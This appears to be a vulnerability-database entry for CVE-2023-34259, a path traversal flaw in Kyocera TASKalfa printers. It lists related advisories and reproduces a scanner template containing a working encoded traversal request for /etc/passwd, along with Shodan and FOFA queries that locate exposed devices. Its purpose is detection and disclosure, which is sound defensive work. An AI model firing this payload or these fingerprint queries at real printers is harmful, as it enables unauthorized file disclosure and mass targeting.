Kyocera TASKalfa - Path Traversal vulnerability, upgrade to latest versio
Reporter | Title | Published | Views | Family All 9 |
---|---|---|---|---|
![]() | CVE-2023-34259 | 3 Nov 202300:00 | – | vulnrichment |
![]() | CVE-2023-34259 | 3 Nov 202300:00 | – | cvelist |
![]() | CVE-2023-34259 | 3 Nov 202304:15 | – | nvd |
![]() | Directory traversal | 3 Nov 202304:15 | – | prion |
![]() | CVE-2023-34259 | 3 Nov 202304:15 | – | cve |
![]() | Kyocera TASKalfa 4053ci 2VG_S000.002.561 Path Traversal / Denial Of Service | 11 Jul 202300:00 | – | packetstorm |
![]() | Generic HTTP Directory Traversal (Web Application URL Parameter) - Active Check | 26 Sep 201700:00 | – | openvas |
![]() | Generic HTTP Directory Traversal (Web Root) - Active Check | 18 Apr 201700:00 | – | openvas |
![]() | Generic HTTP Directory Traversal (Web Dirs) - Active Check | 22 Jul 202100:00 | – | openvas |
id: CVE-2023-34259
info:
name: Kyocera TASKalfa printer - Path Traversal
author: gy741
severity: medium
description: |
CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
- https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
- https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
- https://sec-consult.com/vulnerability-lab/
- https://seclists.org/fulldisclosure/2023/Jul/15
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2023-34259
cwe-id: CWE-22
epss-score: 0.00559
epss-percentile: 0.77589
cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: kyocera
product: d-copia253mf_plus_firmware
shodan-query: http.favicon.hash:-50306417
fofa-query: icon_hash=-50306417
tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer
http:
- method: GET
path:
- "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: word
part: server
words:
- "KM-MFP"
- type: status
status:
- 200
# digest: 4b0a00483046022100a1de75ca0b2380207a57ba62fcd33e15792469e96d43d9dae34d1c8887714081022100823d336edc32d41957794e5ef53d3d73dd6f9a6d6606c52743d864e7b59e302b:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo